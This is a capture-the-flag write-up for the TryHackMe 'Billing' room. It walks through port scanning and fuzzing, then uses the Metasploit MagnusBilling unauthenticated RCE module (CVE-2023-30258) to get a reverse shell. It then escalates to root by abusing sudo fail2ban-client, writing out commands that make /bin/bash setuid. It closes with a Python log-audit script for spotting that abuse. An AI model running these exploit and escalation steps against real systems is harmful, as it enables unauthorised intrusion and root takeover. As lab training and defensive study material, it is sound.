Billing

Thanks to tryhackme and RunasRs

Some mistakes can be costly.

Pasted image 20250316214446.png

Challenge Description

Gain a shell, find the way and escalate your privileges!

Note: Bruteforcing is out of scope for this room.

IP Address: 10.10.152.172

Reconnaissance

Nmap

Now that we have the IP address of the target system, let's first scan it for open ports and their services, so we know where to start exploring.

sudo nmap -sC -sV -vv -T5 10.10.152.172 -oA Nmap/Billing.nmap

Output:

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 60 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
| ssh-rsa [RSA host key omitted]
|   256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBVI/7v4DHnwY/FkhLBQ71076mt5xG/9agRtb+vldezX9vOC2UgKnU6N+ySrhLEx2snCFNJGG0dukytLDxxKIcw=
|   256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII6ogE6DWtLYKAJo+wx+orTODOdYM23iJgDGE2l79ZBN
80/tcp   open  http    syn-ack ttl 60 Apache httpd 2.4.56 ((Debian))
| http-title:             MagnusBilling        
|_Requested resource was http://10.10.152.172/mbilling/
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
3306/tcp open  mysql   syn-ack ttl 60 MariaDB 10.3.23 or earlier (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see that 3 ports are open:

  • Port 22
    • SSH (We need Username and Password)
  • Port 80
    • HTTP
  • Port 3306
    • MySQL Server

Web page.

Browsing to the web page, we see a login page asking for the username and password to login.

Pasted image 20250316215529.png

Let's try to login with some random username and password to understand the behaviour of the page.

Pasted image 20250316215815.png

Clearly, we get the error stating Authentication error. Now, let's try the Forgot your password option.

There is a change in the IP address to 10.10.39.7, because I got busy with some other work and the machine was terminated. So, hope you understand. Thank you.

Ok, clearly we don't have the username, password or any such information, nor do we see any sign-up option. So, let's try fuzzing for other files or folders that we can explore.

Fuzzing

First, let's fuzz for some files, folders and finally subdomains using ffuf.

ffuf -w ~/Pranava__Rao/Tools/FuzzlingList/SecLists/Discovery/Web-Content/raft-medium-files.txt -u "http://10.10.39.7/FUZZ"

Pasted image 20250316223115.png

Here we see a lot of files that we could try to look at to understand the web application and then exploit it, but they were of no use because they are all Forbidden (403).

Pasted image 20250316223533.png

Eureka!!!

While trying to load the page back, I noticed this:
Pasted image 20250316224020.png

It looked like an off-the-shelf application that is running, not a custom-built page. So, the obvious step was to ask my best friend about it.

Pasted image 20250316224321.png

There we go!!!

So, my next step was to see if there was any publicly available exploit for this application.

Pasted image 20250316224501.png

And there was!! Link is HERE

Metasploit

To exploit this target system, according to the blog post, we had to use Metasploit. So, let's fire it up.

msfconsole

Pasted image 20250316225027.png

Now, let's just copy-paste the commands:

use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
show targets
set target 0
show options

Pasted image 20250316225334.png

Now, let's set the following options so Metasploit knows which host to target and where the reverse shell should connect back to after exploitation.

set RHOSTS <target IP address>
set LHOST <your system's IP address>
exploit

Pasted image 20250316231621.png

Then immediately type:

shell

Pasted image 20250316232202.png

In my case, I guess the session just got terminated, so I had to initiate it.

Now, looking around the system, we find the user magnus, and we have access to his home directory as well as his file contents.

Pasted image 20250316232534.png

R007

Ok!!! So now, let's try to escalate to the root user.

First, let's check which commands this user is allowed to run with sudo.

sudo -l

Pasted image 20250316232946.png

And we do!!! We have permission to run /usr/bin/fail2ban-client with sudo, without being asked for a password.

But what is fail2ban?? I went to ask my friend again. Here, from THIS GitHub repository, we get to know that it is an application that bans IP addresses that make too many failed login attempts.

Pasted image 20250316233511.png

So, are there any exploits for it?

Pasted image 20250316233611.png

Link is HERE

Just follow the exploit section of the blog and we are root!!!

sudo /usr/bin/fail2ban-client status

sudo /usr/bin/fail2ban-client get ast-cli-attck actions

sudo /usr/bin/fail2ban-client set ast-cli-attck addaction evil

sudo /usr/bin/fail2ban-client set ast-cli-attck action evil actionban "chmod +s /bin/bash"

chmod +s /bin/bash

sudo /usr/bin/fail2ban-client set ast-cli-attck banip 1.2.3.5

/bin/bash -p

id

Now we are root!!!

Pasted image 20250316234422.png
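As an added defender-side example (not part of this writeup or the referenced blog), the following Python script reads sudo log lines for the fail2ban-client sequence used above and flags the invocations that change what fail2ban will execute as root (addaction, action ... actionban, and the banip that triggers it), while leaving read-only calls like status and get alone. The log lines, host name and timestamps are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sudo log lines (syslog format), modelled on the commands
# run in this room; they are not real host data.
SAMPLE_LOG = """\
Mar 16 23:38:10 billing sudo:   magnus : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client status
Mar 16 23:38:25 billing sudo:   magnus : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client get ast-cli-attck actions
Mar 16 23:38:40 billing sudo:   magnus : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client set ast-cli-attck addaction evil
Mar 16 23:38:55 billing sudo:   magnus : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client set ast-cli-attck action evil actionban chmod +s /bin/bash
Mar 16 23:39:10 billing sudo:   magnus : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client set ast-cli-attck banip 1.2.3.5
Mar 16 23:39:30 billing sudo:   magnus : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Pull the invoking user and the command out of a sudo syslog line.
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?COMMAND=(?P<cmd>.*)$")

# "set <jail> <op> ..." subcommands that alter what the daemon runs as root.
# "status" and "get ..." only read state and are treated as benign.
MUTATING = {"addaction", "action", "banip"}


def classify(cmd: str) -> Optional[Dict[str, str]]:
    """Return None for non-fail2ban commands, else the jail/op/args seen."""
    parts = cmd.split()
    if not parts or not parts[0].endswith("fail2ban-client"):
        return None
    if len(parts) >= 4 and parts[1] == "set" and parts[3] in MUTATING:
        return {"jail": parts[2], "op": parts[3], "args": " ".join(parts[4:])}
    jail = parts[2] if len(parts) > 2 else ""
    return {"jail": jail, "op": "read", "args": ""}


def audit(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per sudo'd fail2ban-client call that mutates a jail."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue
        info = classify(m.group("cmd"))
        if info and info["op"] != "read":
            findings.append({"user": m.group("user"), **info})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print(f"{f['user']} modified jail {f['jail']}: {f['op']} {f['args']}")
```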

Follow me

Instagram: @Pranava__Rao
Linked: Pranava Rao
X: @Pranava__Rao
GitHub: Pranava Rao
YouTube: @Pranava__Rao